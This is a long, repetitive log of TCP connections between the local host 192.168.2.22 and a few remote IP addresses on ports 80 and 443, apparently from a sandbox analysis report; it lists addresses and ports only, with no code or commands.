Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 187.45.240.69:80
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49174
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 142.250.181.238:443 -> 192.168.2.22:49178
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49172
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49179
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49181
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 187.45.240.69:80
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 187.45.240.69:80 -> 192.168.2.22:49180
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49178 -> 142.250.181.238:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49175 -> 104.18.11.207:80
Source: global trafficTCP traffic: 192.168.2.22:49176 -> 142.250.181.238:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49179 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49180 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49181 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49182 -> 187.45.240.69:80
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 187.45.240.69:80
